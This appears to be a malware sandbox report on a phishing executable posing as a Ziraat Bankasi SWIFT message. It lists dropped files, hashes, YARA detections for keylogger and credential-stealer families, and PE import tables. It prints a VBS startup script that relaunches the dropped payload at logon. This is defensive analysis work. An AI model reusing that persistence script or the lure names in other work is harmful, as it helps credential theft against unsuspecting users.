Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.941464840572999
Encrypted:	false
SSDEEP:	6144:tH004pME2r14h74cSr6N0yi3IUSsGIVkwrO7q1RLxe7RRkMmZWe4lp+SaHPZOrhz:tHB4pMVKVCGN0y+PSGrOObLxiRRPsyl3
MD5:	D1B96AAE5C22EADFABDAFEF3E8A7B4FF
SHA1:	DC21B345BE66380653AD775F1B4E6E4689E70944
SHA-256:	C70FE8FE0B9FBDE881C711944C6EBDBE40A5188AD831A776C238CE19D5CBADB5
SHA-512:	0364F3EC794045744F4DE3F6AEAB40D3CBB7473C666036CBF3CCA4C31A42A6F9E127173408303AACBE41C3857329FA1AC0379E68ED3959E46C5A49A818B38A45
Malicious:	false
Preview:	}..PIRL3B4L7..2C.GR1D00O.PJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2C.GR1J/.AZ.C.m.Gx...>[0s7 ^#BQ"z3+<"\2..Rk$G-s.<...co7?.7b>K>h7KV2CSG:!...>..f#.MjE.IyuM=l6.OO..1q!.,`B.J.F.(.`=9N@.N.l3..#.Mt.7If'.=..1YhA.1ZPJRL3F4L7KV2CSG~.{W0OZP..L3.5H7?.2.SGR1D00O.PiSG2O4L.JV2.PGR1D0..ZPJBL3F.M7KVrCSWR1D20O_PJRL3F4I7KV2CSGR.A00KZP.iN3D4L.KV"CSWR1D0 OZ@JRL3F4\7KV2CSGR1D0.ZXP.RL3FTN7.r1CSGR1D00OZPJRL3F4L7KV2CSG..E0,OZPJRL3F4L7KV2CSGR1D00OZPJR.>D4.7KV2CSGR1D00.[P.SL3F4L7KV2CSGR1D00OZPJRL3F4bC..FCSGJ.E00_ZPJ.M3F0L7KV2CSGR1D00OzPJ2bA"U8VKV..SGR.E00!ZPJ.M3F4L7KV2CSGR1.00.t4+&-3F4..KV2cQGR'D00EXPJRL3F4L7KV2C.GR.jBC=9PJR..E4LWIV2ePGR.F00OZPJRL3F4L7.V2.SGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4

C:\Users\user\AppData\Local\Temp\aut7934.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\directiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.941464840572999
Encrypted:	false
SSDEEP:	6144:tH004pME2r14h74cSr6N0yi3IUSsGIVkwrO7q1RLxe7RRkMmZWe4lp+SaHPZOrhz:tHB4pMVKVCGN0y+PSGrOObLxiRRPsyl3
MD5:	D1B96AAE5C22EADFABDAFEF3E8A7B4FF
SHA1:	DC21B345BE66380653AD775F1B4E6E4689E70944
SHA-256:	C70FE8FE0B9FBDE881C711944C6EBDBE40A5188AD831A776C238CE19D5CBADB5
SHA-512:	0364F3EC794045744F4DE3F6AEAB40D3CBB7473C666036CBF3CCA4C31A42A6F9E127173408303AACBE41C3857329FA1AC0379E68ED3959E46C5A49A818B38A45
Malicious:	false
Preview:	}..PIRL3B4L7..2C.GR1D00O.PJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2C.GR1J/.AZ.C.m.Gx...>[0s7 ^#BQ"z3+<"\2..Rk$G-s.<...co7?.7b>K>h7KV2CSG:!...>..f#.MjE.IyuM=l6.OO..1q!.,`B.J.F.(.`=9N@.N.l3..#.Mt.7If'.=..1YhA.1ZPJRL3F4L7KV2CSG~.{W0OZP..L3.5H7?.2.SGR1D00O.PiSG2O4L.JV2.PGR1D0..ZPJBL3F.M7KVrCSWR1D20O_PJRL3F4I7KV2CSGR.A00KZP.iN3D4L.KV"CSWR1D0 OZ@JRL3F4\7KV2CSGR1D0.ZXP.RL3FTN7.r1CSGR1D00OZPJRL3F4L7KV2CSG..E0,OZPJRL3F4L7KV2CSGR1D00OZPJR.>D4.7KV2CSGR1D00.[P.SL3F4L7KV2CSGR1D00OZPJRL3F4bC..FCSGJ.E00_ZPJ.M3F0L7KV2CSGR1D00OzPJ2bA"U8VKV..SGR.E00!ZPJ.M3F4L7KV2CSGR1.00.t4+&-3F4..KV2cQGR'D00EXPJRL3F4L7KV2C.GR.jBC=9PJR..E4LWIV2ePGR.F00OZPJRL3F4L7.V2.SGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4

C:\Users\user\AppData\Local\Temp\autA833.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\directiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.941464840572999
Encrypted:	false
SSDEEP:	6144:tH004pME2r14h74cSr6N0yi3IUSsGIVkwrO7q1RLxe7RRkMmZWe4lp+SaHPZOrhz:tHB4pMVKVCGN0y+PSGrOObLxiRRPsyl3
MD5:	D1B96AAE5C22EADFABDAFEF3E8A7B4FF
SHA1:	DC21B345BE66380653AD775F1B4E6E4689E70944
SHA-256:	C70FE8FE0B9FBDE881C711944C6EBDBE40A5188AD831A776C238CE19D5CBADB5
SHA-512:	0364F3EC794045744F4DE3F6AEAB40D3CBB7473C666036CBF3CCA4C31A42A6F9E127173408303AACBE41C3857329FA1AC0379E68ED3959E46C5A49A818B38A45
Malicious:	false
Preview:	}..PIRL3B4L7..2C.GR1D00O.PJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2C.GR1J/.AZ.C.m.Gx...>[0s7 ^#BQ"z3+<"\2..Rk$G-s.<...co7?.7b>K>h7KV2CSG:!...>..f#.MjE.IyuM=l6.OO..1q!.,`B.J.F.(.`=9N@.N.l3..#.Mt.7If'.=..1YhA.1ZPJRL3F4L7KV2CSG~.{W0OZP..L3.5H7?.2.SGR1D00O.PiSG2O4L.JV2.PGR1D0..ZPJBL3F.M7KVrCSWR1D20O_PJRL3F4I7KV2CSGR.A00KZP.iN3D4L.KV"CSWR1D0 OZ@JRL3F4\7KV2CSGR1D0.ZXP.RL3FTN7.r1CSGR1D00OZPJRL3F4L7KV2CSG..E0,OZPJRL3F4L7KV2CSGR1D00OZPJR.>D4.7KV2CSGR1D00.[P.SL3F4L7KV2CSGR1D00OZPJRL3F4bC..FCSGJ.E00_ZPJ.M3F0L7KV2CSGR1D00OzPJ2bA"U8VKV..SGR.E00!ZPJ.M3F4L7KV2CSGR1.00.t4+&-3F4..KV2cQGR'D00EXPJRL3F4L7KV2C.GR.jBC=9PJR..E4LWIV2ePGR.F00OZPJRL3F4L7.V2.SGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4

C:\Users\user\AppData\Local\Temp\chordates

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.941464840572999
Encrypted:	false
SSDEEP:	6144:tH004pME2r14h74cSr6N0yi3IUSsGIVkwrO7q1RLxe7RRkMmZWe4lp+SaHPZOrhz:tHB4pMVKVCGN0y+PSGrOObLxiRRPsyl3
MD5:	D1B96AAE5C22EADFABDAFEF3E8A7B4FF
SHA1:	DC21B345BE66380653AD775F1B4E6E4689E70944
SHA-256:	C70FE8FE0B9FBDE881C711944C6EBDBE40A5188AD831A776C238CE19D5CBADB5
SHA-512:	0364F3EC794045744F4DE3F6AEAB40D3CBB7473C666036CBF3CCA4C31A42A6F9E127173408303AACBE41C3857329FA1AC0379E68ED3959E46C5A49A818B38A45
Malicious:	false
Preview:	}..PIRL3B4L7..2C.GR1D00O.PJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2C.GR1J/.AZ.C.m.Gx...>[0s7 ^#BQ"z3+<"\2..Rk$G-s.<...co7?.7b>K>h7KV2CSG:!...>..f#.MjE.IyuM=l6.OO..1q!.,`B.J.F.(.`=9N@.N.l3..#.Mt.7If'.=..1YhA.1ZPJRL3F4L7KV2CSG~.{W0OZP..L3.5H7?.2.SGR1D00O.PiSG2O4L.JV2.PGR1D0..ZPJBL3F.M7KVrCSWR1D20O_PJRL3F4I7KV2CSGR.A00KZP.iN3D4L.KV"CSWR1D0 OZ@JRL3F4\7KV2CSGR1D0.ZXP.RL3FTN7.r1CSGR1D00OZPJRL3F4L7KV2CSG..E0,OZPJRL3F4L7KV2CSGR1D00OZPJR.>D4.7KV2CSGR1D00.[P.SL3F4L7KV2CSGR1D00OZPJRL3F4bC..FCSGJ.E00_ZPJ.M3F0L7KV2CSGR1D00OzPJ2bA"U8VKV..SGR.E00!ZPJ.M3F4L7KV2CSGR1.00.t4+&-3F4..KV2cQGR'D00EXPJRL3F4L7KV2C.GR.jBC=9PJR..E4LWIV2ePGR.F00OZPJRL3F4L7.V2.SGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4L7KV2CSGR1D00OZPJRL3F4

C:\Users\user\AppData\Local\Temp\server01.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	5.678429468734117
Encrypted:	false
SSDEEP:	1536:kwa4JHA8xaqWUiRzGJVeygdqcyxCVf1UMR7pfpPYlM:M4JgqWUi5GJVey2qcyi+MDfpPr
MD5:	0CDBE0CD3CB5C2F0B2CB17E4417D43F5
SHA1:	E3AA6201E5A42ADFA1BFB4506D6852DE22E07494
SHA-256:	7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31
SHA-512:	3D125DAE61F960D7E32C0EB4D301EFA3322AB8201E83FB7343EF4C28ED6B788B1906E09106F8A3052630DD880FD278623F7887ED472D7C2552DB96CB3F1C8986
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v..........^.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...du... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B................@.......H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\cyclop\directiveness.exe

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1266176
Entropy (8bit):	7.203204986695958
Encrypted:	false
SSDEEP:	24576:dtb20pkaCqT5TBWgNQ7aQzRtDH9H9CidINLr0Wmcd6A:OVg5tQ7aQzRVH9dkEWmA5
MD5:	91809FF066DB31AB6E244E123D3DC970
SHA1:	5FD9295C5D2445B0706C85CFB720C992F3DB0076
SHA-256:	9A1973E5FED817352699227BA40F3D5149221221882377C9A127BBF011F7F1CD
SHA-512:	006A580BD1D22148A10B08F5D4FAAE5EF0376EBACBF38EC0BF8C86077C35CBF06CAE64A72ED471DC3882E1964AD33A8D9D9A82EDA7B27724A6C422713554CFA5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....Cg..........".................t_............@.................................Vr....@...@.......@......................p..\|....@..d.......................Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...d....@......................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665670656
Entropy (8bit):	7.999999252923202
Encrypted:	true
SSDEEP:
MD5:	BFC26CE0E7B874E618CC8D0CF3657608
SHA1:	4AE5C62CBABA8D0AF92B6D851014CA8FA88DDCD4
SHA-256:	494DB1E44A51C134170E8115D4D6E18064F6936C70EA014FA57AFFBD5E50FA0D
SHA-512:	E45CC2D5A29FE861F2635F77E569B5A735494747C4FA05E83BCE19BA68A4BC05820B72696BC04C59B19E8AC6B9F74B64ABE204E354408A9BFDDC2B375187D69E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
Category:	dropped
Size (bytes):	1810
Entropy (8bit):	2.3987575963018974
Encrypted:	false
SSDEEP:	24:8elKPjeWLqeMNmG9lb4R+O4ZvPqRyJpqy:8LjX0b4R+ZXqRzy
MD5:	9FF67100958DB64C924BC46DEBDC657D
SHA1:	4B5E021A4468DB76B0F2CA28B29F2893CB6068CE
SHA-256:	8F680564379DAB5C9B90EE67F2E80596D868005A237638902B009A4AEA4A1AC2
SHA-512:	D7091125CE187DA3EB7D8BA5705BB68B7C4EAA029BDEB5425D5696FC7C823C773B960FB8991920053E8BD58AA69B8FA6511BC92A1E0A5622DAFDA7FFD1357833
Malicious:	false
Preview:	L..................F.@....................................................../....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.2.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs

Download File

Process:	C:\Users\user\AppData\Local\cyclop\directiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	278
Entropy (8bit):	3.407821517409213
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclgMsUEZ+lX1Glf/1AyPMlm6nriIM8lfQVn:DsO+vNlgMsQ1y11km4mA2n
MD5:	CCB813D7357D7BABF97267CF58F49496
SHA1:	9586737F9BC6C74B9FA01FD90DF702106ECC6480
SHA-256:	F7514BFD23CC8690EECD7197C9D62DEE381B9814A5B6644C4383629706116770
SHA-512:	23F02A9779281F90D7BBCFE97B15D9E60288C7760A9AA400423B97312C4630E0793859D053B991D1A830CE50DA5B693CE88031FA209E0A61ACB08538B62D315A
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.c.y.c.l.o.p.\.d.i.r.e.c.t.i.v.e.n.e.s.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.203204986695958
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
File size:	1'266'176 bytes
MD5:	91809ff066db31ab6e244e123d3dc970
SHA1:	5fd9295c5d2445b0706c85cfb720c992f3db0076
SHA256:	9a1973e5fed817352699227ba40f3d5149221221882377c9a127bbf011f7f1cd
SHA512:	006a580bd1d22148a10b08f5d4faae5ef0376ebacbf38ec0bf8c86077c35cbf06cae64a72ed471dc3882e1964ad33a8d9d9a82eda7b27724a6c422713554cfa5
SSDEEP:	24576:dtb20pkaCqT5TBWgNQ7aQzRtDH9H9CidINLr0Wmcd6A:OVg5tQ7aQzRVH9dkEWmA5
TLSH:	6645DF1373DE8361C3B26273BA257741AEBF782506A5F46B2FD4093DE920162521EB73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6743B581 [Sun Nov 24 23:23:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F048D34F25Fh
jmp 00007F048D342274h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F048D3423FAh
cmp edi, eax
jc 00007F048D34275Eh
bt dword ptr [004C0158h], 01h
jnc 00007F048D3423F9h
rep movsb
jmp 00007F048D34270Ch
cmp ecx, 00000080h
jc 00007F048D3425C4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F048D342400h
bt dword ptr [004BA370h], 01h
jc 00007F048D3428D0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F048D34259Dh
test edi, 00000003h
jne 00007F048D3425AEh
test esi, 00000003h
jne 00007F048D34258Dh
bt edi, 02h
jnc 00007F048D3423FFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F048D342403h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F048D342455h
bt esi, 03h
jnc 00007F048D3424A8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x6c064	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x131000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x6c064	0x6c200	9ecbae91135bf620348b8bacaaae9fb0	False	0.9405617774566474	data	7.923344491331878	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x131000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xc9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xca148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc410	0x6373b	data			1.0003215868223048
RT_GROUP_ICON	0x12fb4c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12fbc4	0x14	data	English	Great Britain	1.15
RT_VERSION	0x12fbd8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12fcb4	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
